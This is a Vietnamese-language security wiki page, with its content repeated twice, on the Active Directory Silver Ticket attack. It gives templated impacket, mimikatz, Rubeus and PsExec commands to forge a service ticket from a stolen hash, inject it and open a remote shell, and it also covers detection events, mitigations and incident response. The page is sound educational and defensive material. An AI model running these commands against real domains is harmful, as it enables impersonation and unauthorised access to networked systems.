Silver Ticket

Silver ticket

Silver Ticket attack liên quan đến việc khai thác service ticket trong AD. Phương pháp này dựa vào việc lấy được NTLM hash của một service account, như computer account, để giả mạo một TGS ticket. Với vé giả mạo, attacker có thể truy cập những dịch vụ trên mạng, mạo danh bất kỳ người dùng nào, thường nhằm mục đích giành đặc quyền quản trị. Việc sử dụng khóa AES để giả mạo sẽ an toàn và ít bị phát hiện hơn

Để tạo vé:

On Linux

python ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>
export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache 
python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass

On Windows

//# Create the ticket
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET>"

# Inject the ticket
mimikatz.exe "kerberos::ptt <TICKET_FILE>"
.\Rubeus.exe ptt /ticket:<TICKET_FILE>

# Obtain a shell
.\PsExec.exe -accepteula \\<TARGET> cmd

Dịch vụ CIFS được đánh dấu là mục tiêu chung để truy cập hệ thống tệp của nạn nhân, nhưng các dịch vụ khác như HOST và RPCSS có thể được khai thác để thực hiện các tác vụ và truy vấn VMI

Available Services

Service Type

Service Silver Tickets

WMI

HOST

RPCSS

PowerShell Remoting

HOST

HTTP

Tùy vào hệ điều hành:

WSMAN

RPCSS

WinRM

HOST

HTTP

Một số trường hợp có thể yêu cầu WINRM

Scheduled Tasks

HOST

Windows File Share, also psexec

CIFS

LDAP operations, included DCSync

LDAP

Windows Remote Server Administration Tools

RPCSS

LDAP

CIFS

Golden Tickets

krbtgt

Sử dụng Rubeus có thể yêu cầu tất cả các vé này bằng cách sử dụng tham số:

/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm

Silverr tickets Event IDs

4624: Account Logon
4634: Account Logoff
4672: Admin Logon

Detect, Mitigate and Respond

DETECT

Quy trình thông thường để có được TGS ticket bao gồm việc yêu cầu DC tạo một vé. Sau khi người gọi chứng minh danh tính, DC sẻ trả lời bằng TGS được mã hóa bằng mật khẩu service account. Bởi vì kẻ thù đã xâm phạm mật khẩu đó nên chúng có thể tạo ra các TGS ticket mà không cần liên lạc với DC

Việc phát hiện Silver Ticket chỉ có thể thực hiện được trên endpoint và liên quan đến việc kiểm tra TGS ticket để tìm các dấu hiệu thao túng tinh vi như:

Tên người dùng không tồn tại
Thành viên nhóm bị điều chỉnh
Username và ID không khớp
Yếu hơn các loại mã hóa thông thường hoặc thời gian tồn tại cẩu vé vượt quá mức tối đa của miền (mặc định của miền là 10h, minikatz là 10 năm)

Event

Source

Information

Member Computers

User’s security identifier (SID)
Group memberships

Member Computers

User’s security identifier (SID)
Username
Source IP (indicating potentially compromised host)

MITIGATE

Ap dụng các biện pháp quản lý mật khẩu mạnh cho service account.
Xóa bỏ đặc quền quản trị của người dùng cuối trên các máy trạm thành viên, và áp dụng các biện pháp kiểm soát leo thang đặc quyền
Giảm thiểu quyền truy cập quản trị vào máy trạm và máy chủ của thành viên xuống mức ít cần thiết nhất
Không cho phép người dùng sở hữu các đặc quyền quản trị qua ranh giới bảo mật.

RESPOND

Kích hoạt quy trình ứng phó sự cố và cảnh báo nhóm ứng phó sự cố
Cách ly mọi máy tính có liên quan đến điều tra pháp y, xóa bỏ và phục hồi
Đặt lại mật khẩu của tài khoản dịch vụ bị xâm phạm

References

PreviousDemo NextDemo

Last updated 9 months ago

Silver Ticket

Silver ticket

Để tạo vé:

On Linux

python ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>
export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache 
python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass

On Windows

//# Create the ticket
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET>"

# Inject the ticket
mimikatz.exe "kerberos::ptt <TICKET_FILE>"
.\Rubeus.exe ptt /ticket:<TICKET_FILE>

# Obtain a shell
.\PsExec.exe -accepteula \\<TARGET> cmd

Available Services

Service Type

Service Silver Tickets

WMI

HOST

RPCSS

PowerShell Remoting

HOST

HTTP

Tùy vào hệ điều hành:

WSMAN

RPCSS

WinRM

HOST

HTTP

Một số trường hợp có thể yêu cầu WINRM

Scheduled Tasks

HOST

Windows File Share, also psexec

CIFS

LDAP operations, included DCSync

LDAP

Windows Remote Server Administration Tools

RPCSS

LDAP

CIFS

Golden Tickets

krbtgt

Sử dụng Rubeus có thể yêu cầu tất cả các vé này bằng cách sử dụng tham số:

/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm

Silverr tickets Event IDs

4624: Account Logon
4634: Account Logoff
4672: Admin Logon

Detect, Mitigate and Respond

DETECT

Việc phát hiện Silver Ticket chỉ có thể thực hiện được trên endpoint và liên quan đến việc kiểm tra TGS ticket để tìm các dấu hiệu thao túng tinh vi như:

Tên người dùng không tồn tại
Thành viên nhóm bị điều chỉnh
Username và ID không khớp
Yếu hơn các loại mã hóa thông thường hoặc thời gian tồn tại cẩu vé vượt quá mức tối đa của miền (mặc định của miền là 10h, minikatz là 10 năm)

Event

Source

Information

: Event ID

Member Computers

User’s security identifier (SID)
Group memberships

: Event ID

Member Computers

User’s security identifier (SID)
Username
Source IP (indicating potentially compromised host)

MITIGATE

Ap dụng các biện pháp quản lý mật khẩu mạnh cho service account.
Enable .
Xóa bỏ đặc quền quản trị của người dùng cuối trên các máy trạm thành viên, và áp dụng các biện pháp kiểm soát leo thang đặc quyền
Giảm thiểu quyền truy cập quản trị vào máy trạm và máy chủ của thành viên xuống mức ít cần thiết nhất
Sử dụng các giải pháp như để tạo mật khẩu mạnh, ngẫu nhiên và duy nhất cho tài khoản quản trị viên cục bộ và tự động thay đổi mật khẩu theo định kỳ.
Áp dụng các biện pháp giảm thiểu được khuyến nghị cho .
Không cho phép người dùng sở hữu các đặc quyền quản trị qua ranh giới bảo mật.

RESPOND

Kích hoạt quy trình ứng phó sự cố và cảnh báo nhóm ứng phó sự cố
Cách ly mọi máy tính có liên quan đến điều tra pháp y, xóa bỏ và phục hồi
Đặt lại mật khẩu của tài khoản dịch vụ bị xâm phạm

References

Silver TicketHackTricks

Silver Ticket AttackNetwrix

PreviousDemo NextDemo

Last updated 9 months ago